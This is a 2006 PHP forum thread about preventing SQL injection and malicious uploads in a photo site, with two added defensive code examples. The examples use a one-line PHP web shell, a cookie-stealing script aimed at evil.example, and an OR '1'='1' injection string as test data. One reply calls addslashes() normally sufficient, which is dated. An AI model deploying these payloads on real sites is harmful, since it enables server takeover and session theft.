Bytes | Software Development & Data Engineering Community

SQL injection and PHP spoofing

MySQL newbie, not new to computing.

In my application I accept photos and data, some structured and
some free text. I store the information (but not the images) in a
MySQL database and then from that information I construct a web
page for the user.

The images are always displayed within an <img> tag.

The text is displayed as part of the web page, within <p> tags.

The users are all registered and (more or less) trusted individuals

<paranoid mode on>

1: Do I need to worry about SQL injection if I do not process the
incoming free form data ?

2: Do I need to worry about PHP statements being embedded in the
free form data ?

3: if so, what is the best practices to protect my database/site ?

<paranoid mode off>

--
bill
Dec 19 '06 #1
On Tue, 19 Dec 2006 06:37:22 -0500, in comp.lang.php bill
<no****@spamcop.net>
<HL******************************@cablespeedmi.com> wrote:
>| 1: Do I need to worry about SQL injection if I do not process the
>| incoming free form data ?
>|
>| 2: Do I need to worry about PHP statements being embedded in the
>| free form data ?
>|
>| 3: if so, what is the best practices to protect my database/site ?
http://en.wikibooks.org/wiki/Program...:SQL_Injection
http://www.php.net/manual/en/securit...-injection.php
http://dev.mysql.com/tech-resources/...curity-ch3.pdf
---------------------------------------------------------------
jn******@yourpantsyahoo.com.au : Remove your pants to reply
---------------------------------------------------------------
Dec 19 '06 #2
In article <HL******************************@cablespeedmi.com>,
bill <no****@spamcop.net> wrote:
> 1: Do I need to worry about SQL injection if I do not process the
> incoming free form data ?

Worry? Maybe not. Prevent? Yes.

> 2: Do I need to worry about PHP statements being embedded in the
> free form data ?

No. PHP statements in form data won't be executed.

But, if they upload an "image" that really is "malware.php" and you
save it to disk and it can be browsed to through DOCUMENT_ROOT, then
it will be executed and it could do all sorts of nasty stuff.

> 3: if so, what is the best practices to protect my database/site ?

Make it ugly so no one will use it :-D

--
Sandman[.net]
Dec 19 '06 #3
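Sandman's point about an uploaded "image" that is really malware.php is the one that turns a content bug into code execution on the server. The following is an added example, not code from the thread or from bill's application, of an upload path built so that it cannot happen: the file's bytes, not its name or claimed MIME type, decide whether it is accepted; the stored name is generated by the server; the store directory (PHOTO_STORE, an assumed path) sits outside DOCUMENT_ROOT; and the page's <img> tags point at a small script (photo.php, assumed) that streams the bytes back with a Content-Type the server chose. The CLI self-check at the bottom feeds it two constructed files.

```php
<?php
// Added example, not code from the thread. Assumed names: PHOTO_STORE (a
// directory the web server cannot serve or execute from) and photo.php (the
// script whose serve_photo() the page's <img src="photo.php?id=..."> calls).
declare(strict_types=1);

const PHOTO_STORE = '/srv/photo-store';           // assumption: outside DOCUMENT_ROOT
const MAX_BYTES   = 5 * 1024 * 1024;

// The only image types accepted, keyed by what getimagesize() reads from the
// bytes, mapped to the extension and Content-Type *we* assign. The client's
// filename and its claimed MIME type are never consulted.
const ALLOWED = [
    IMAGETYPE_JPEG => ['jpg', 'image/jpeg'],
    IMAGETYPE_PNG  => ['png', 'image/png'],
    IMAGETYPE_GIF  => ['gif', 'image/gif'],
];

/** Return the IMAGETYPE_* constant for a file, or throw if it is not an accepted image. */
function detect_image_type(string $path): int
{
    if (filesize($path) > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    $info = @getimagesize($path);             // parses the image header, ignores the name
    if ($info === false || !isset(ALLOWED[$info[2]])) {
        throw new RuntimeException('not a supported image');
    }
    return $info[2];
}

/** Validate one entry of $_FILES and move it into the private store under a name we chose. */
function store_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    $type = detect_image_type($file['tmp_name']);
    // Random name: nothing the client sent ends up in a path, so neither a
    // "../../htdocs/shell.php" traversal nor a ".php" extension is possible.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$type][0];
    if (!move_uploaded_file($file['tmp_name'], PHOTO_STORE . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

/**
 * Serve a stored photo. The browser never gets a direct path into the store,
 * and the web server never has a reason to treat the file as a script.
 */
function serve_photo(string $requestedName): void
{
    // Accept only the exact shape store_upload() generates; anything else is a 404.
    if (!preg_match('/^[0-9a-f]{32}\.(jpg|png|gif)$/', $requestedName)) {
        http_response_code(404);
        return;
    }
    $path = PHOTO_STORE . '/' . $requestedName;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    $type = detect_image_type($path);          // re-check: the bytes decide the type
    header('Content-Type: ' . ALLOWED[$type][1]);
    header('X-Content-Type-Options: nosniff');   // the browser must not "sniff" it into HTML
    header('Content-Disposition: inline; filename="' . $requestedName . '"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
}

// --- Self-check with constructed files (runs from the CLI, no web server needed) ---
if (PHP_SAPI === 'cli') {
    $tmp = sys_get_temp_dir();

    // A "photo" that is really PHP, given a friendly name: rejected because of its bytes.
    $fake = $tmp . '/cat.jpg';
    file_put_contents($fake, "<?php system(\$_GET['cmd']); ?>");
    try {
        detect_image_type($fake);
        echo "FAIL: script accepted as image\n";
    } catch (RuntimeException $e) {
        echo "rejected fake image: {$e->getMessage()}\n";
    }

    // A genuine 1x1 GIF (constructed), deliberately misnamed: accepted and typed by its contents.
    $real = $tmp . '/anything.php';
    file_put_contents($real, base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'));
    echo 'accepted real image as ', ALLOWED[detect_image_type($real)][1], "\n";

    unlink($fake);
    unlink($real);
}
```

Two caveats. The getimagesize() check is a filter, not the defence: a real JPEG with PHP appended after the image data still passes it, which is exactly why the bytes must land somewhere the server will never execute them and must be served by readfile() rather than by a direct URL. If the store has to live under DOCUMENT_ROOT for some reason, script execution must be switched off for that directory in the web server configuration, and re-encoding the upload through GD before saving it is a reasonable extra step. Second, the <img> tag on the generated page should be built from the returned name only, so that attribute never carries anything the uploader typed.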
bill wrote:
> 1: Do I need to worry about SQL injection if I do not process the
> incoming free form data ?

Why do you let the visitor fill in data if you do not process it?

> 2: Do I need to worry about PHP statements being embedded in the
> free form data ?

That depends 100% on what you do with the data.

A man walks into a shop and wants to buy a knife.
He asks the guy behind the counter: "Do I have to worry this knife will be
used for something dangerous?"

> 3: if so, what is the best practices to protect my database/site ?

Understand how it works.
Understand how the underlying OS works.
Understand how the security is implemented.
Understand what users are and what rights are on both the OS and the
database.

> <paranoid mode off>

The fact that you are paranoid, doesn't mean they are not after you.

It is good you ask yourself these questions, but don't expect us to answer
them in depth because security is a broad subject.

Regards,
Erwin Moller
Dec 19 '06 #4
bill wrote:
> 1: Do I need to worry about SQL injection if I do not process the
> incoming free form data ?

Yes. Never, but never, trust user input. Always validate it and make sure
it can do no harm before doing anything else with it.

> 2: Do I need to worry about PHP statements being embedded in the
> free form data ?

Probably not.

> 3: if so, what is the best practices to protect my database/site ?

The MySQL module provides a function called mysql_real_escape_string() or
some silly name like that. (For other databases, addslashes() will
normally suffice.) Run any user input through that before inserting/
updating it into your database.

For output, pass everything through htmlentities() to make sure it is
"safe" to appear. For example, what happens if a photo description
consists of:

<big><strong><font color=red>Hello!!!

This isn't necessarily a malicious user -- just someone who wanted to type
a big, bold, red greeting to the world but forgot to close their tags.
Imagine what a malicious user could do (e.g. run javascript off your site).

--
Toby A Inkster BSc (Hons) ARCS
Contact Me ~ http://tobyinkster.co.uk/contact

Dec 19 '06 #5
> 3: if so, what is the best practices to protect my database/site ?

Two simple rules to prevent SQL injection (MySQL)

1. if the input data is string, escape the quote

e.g.

this is "dsds => this is \"dsds

2. if the input data is integer, make sure it is really integer and
never contains characters

e.g. $i = intval($i); // force integer

Dec 19 '06 #6
howa wrote:
>> 3: if so, what is the best practices to protect my database/site ?
>
> Two simple rules to prevent SQL injection (MySQL)
>
> 1. if the input data is string, escape the quote
>
> e.g.
>
> this is "dsds => this is \"dsds

Which does not work with all character sets. Better is to use
mysql_real_escape_string().

> 2. if the input data is integer, make sure it is really integer and
> never contains characters
>
> e.g. $i = intval($i); // force integer

--
==================
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp.
js*******@attglobal.net
==================
Dec 19 '06 #7
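Toby's reply (#5) describes both halves of the fix, howa (#6) gives the two rules, and Jerry (#7) adds the character-set caveat. The following is an added example, written for this page and not code from any of the posters, that puts the three together in one script: keep user text out of the SQL grammar on the way in, and out of the HTML grammar on the way out. SQLite through PDO stands in for MySQL so it runs without a server (the `photos` table and its rows are constructed for the demo); the same PDO calls work unchanged against a MySQL DSN. It also shows concretely what Rafe Culpin says further down the thread: a quote in the text ends the data, and whatever follows is parsed as SQL.

```php
<?php
// Added example, not code from the thread. SQLite in memory is an assumption
// standing in for bill's MySQL database; the table and rows are constructed.
declare(strict_types=1);

$db = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    // With pdo_mysql, also set PDO::ATTR_EMULATE_PREPARES => false so that
    // placeholders are bound server-side rather than interpolated client-side.
]);
$db->exec('CREATE TABLE photos (id INTEGER PRIMARY KEY, owner TEXT NOT NULL, caption TEXT NOT NULL)');

// Constructed sample rows, inserted through a prepared statement.
$ins = $db->prepare('INSERT INTO photos (owner, caption) VALUES (:owner, :caption)');
foreach ([
    ['alice', 'Sunset over the lake'],
    ['bob',   '<big><strong><font color=red>Hello!!!'],   // Toby's un-closed-tags caption
    ['carol', "Nice shot <script>document.location='http://evil.example/?c='+document.cookie</script>"],
] as [$owner, $caption]) {
    $ins->execute([':owner' => $owner, ':caption' => $caption]);
}

// --- The way in -------------------------------------------------------------

// 1. Vulnerable: the user's text becomes part of the SQL statement itself.
function captions_for_owner_vulnerable(PDO $db, string $owner): array
{
    $sql = "SELECT caption FROM photos WHERE owner = '$owner'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// 2. Escaped: quote() applies the *connection's* escaping rules, which is the
//    property Jerry is pointing at. With mysqli that is mysqli_set_charset()
//    followed by mysqli_real_escape_string(); addslashes() knows nothing about
//    the connection character set and is not a substitute.
function captions_for_owner_escaped(PDO $db, string $owner): array
{
    $sql = 'SELECT caption FROM photos WHERE owner = ' . $db->quote($owner);
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// 3. Preferred: a prepared statement. The SQL is parsed once with a
//    placeholder; the value is bound separately and can never be read as SQL.
function captions_for_owner(PDO $db, string $owner): array
{
    $stmt = $db->prepare('SELECT caption FROM photos WHERE owner = :owner');
    $stmt->execute([':owner' => $owner]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// howa's integer rule, tightened: reject anything that is not a positive id
// instead of letting intval() silently turn "12 OR 1=1" into 12, then bind
// the value as an integer.
function caption_by_id(PDO $db, string $rawId): ?string
{
    if (!preg_match('/^[1-9][0-9]*$/', $rawId)) {
        return null;
    }
    $stmt = $db->prepare('SELECT caption FROM photos WHERE id = :id');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetchColumn();
    return $row === false ? null : $row;
}

// --- The way out ------------------------------------------------------------

// Encode for HTML element content (the <p> context bill describes). The stored
// text may *say* <script>, but after encoding it cannot *be* a script element.
function render_caption(string $caption): string
{
    return '<p>' . htmlspecialchars($caption, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8') . '</p>';
}

// --- Demonstration ------------------------------------------------------------

$payload = "x' OR '1'='1";   // constructed attacker input typed into the "owner" field

// The single quote closes the literal; OR '1'='1' makes the WHERE clause true
// for every row, so every owner's captions come back.
echo 'vulnerable: ', count(captions_for_owner_vulnerable($db, $payload)), " rows\n";
// Here the same text is just an owner name nobody has.
echo 'escaped:    ', count(captions_for_owner_escaped($db, $payload)), " rows\n";
echo 'prepared:   ', count(captions_for_owner($db, $payload)), " rows\n";

var_dump(caption_by_id($db, '2'));         // bob's caption, fetched by a bound integer
var_dump(caption_by_id($db, '2 OR 1=1'));  // rejected before it gets anywhere near SQL

foreach (captions_for_owner($db, 'carol') as $c) {
    echo render_caption($c), "\n";         // the <script> arrives as &lt;script&gt;
}
```

Run it from the command line with a PHP that has pdo_sqlite. The vulnerable query returns all three rows for the payload while the escaped and prepared versions return none; that difference is the whole of "SQL injection". Two things the script does not cover: on MySQL, stacked statements such as the "now delete the database" text Rafe describes are refused by mysqli_query() but accepted by mysqli_multi_query(), so the latter should never see user input; and htmlspecialchars() is right for text between tags but not for a URL or attribute value, which needs its own quoting, so the src of the <img> tag should be built from a server-generated name only.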

bill wrote:
> 1: Do I need to worry about SQL injection if I do not process the
> incoming free form data ?
>
> 2: Do I need to worry about PHP statements being embedded in the
> free form data ?
>
> 3: if so, what is the best practices to protect my database/site ?
Post an email to me and I'll forward a small wrapper class, which
protects against this problem.

Dec 19 '06 #8
>> 3: if so, what is the best practices to protect my database/site ?
>
> Make it ugly so no one will use it :-D

good idea, but I think I will not try for this - might get there
anyway.

bill
Dec 19 '06 #9
Erwin Moller wrote:
> bill wrote:
>> 1: Do I need to worry about SQL injection if I do not process the
>> incoming free form data ?
>
> Why do you let the visitor fill in data if you do not process it?

I guess I should be more clear. I save the data in a mysql
database and then paste it into a generated web page. By process
I meant mysql_real_escape_string() (about which I did not know)

bill
Dec 19 '06 #10
bill wrote:
> 1: Do I need to worry about SQL injection if I do not process the
> incoming free form data ?
>
> 2: Do I need to worry about PHP statements being embedded in the free
> form data ?
>
> 3: if so, what is the best practices to protect my database/site ?

thanks all for the suggestions.

As I never use user input to a query string, just data, and the
images are not accessible except inside of <img tags it would
seem that I am moderately safe.

bill
Dec 19 '06 #11
In article <nb******************************@cablespeedmi.com>,
no****@spamcop.net (bill) wrote:
>>> 1: Do I need to worry about SQL injection if I do not process the
>>> incoming free form data ?
>> Why do you let the visitor fill in data if you do not process it?
>
> I guess I should be more clear. I save the data in a mysql
> database

In that case an injection attack might well be possible and must be
guarded against. The text passed to the database might include a string to
say "That's the end of the data to be stored, and now here's the command
to delete the database".

--
To reply email rafe, at the address cix co uk
Dec 19 '06 #12
Rafe Culpin wrote:
> In article <nb******************************@cablespeedmi.com>,
> no****@spamcop.net (bill) wrote:
>>>> 1: Do I need to worry about SQL injection if I do not process the
>>>> incoming free form data ?
>>> Why do you let the visitor fill in data if you do not process it?
>> I guess I should be more clear. I save the data in a mysql
>> database
>
> In that case an injection attack might well be possible and must be
> guarded against. The text passed to the database might include a string to
> say "That's the end of the data to be stored, and now here's the command
> to delete the database".

Ok, thank you.
I will sanitize the data.
bill
Dec 19 '06 #13
In article <nb******************************@cablespeedmi.com>,
bill <no****@spamcop.net> wrote:
>>> 3: if so, what is the best practices to protect my database/site ?
>> Make it ugly so no one will use it :-D
>
> good idea, but I think I will not try for this - might get there
> anyway.
>
> bill

:)

--
Sandman[.net]
Dec 20 '06 #14
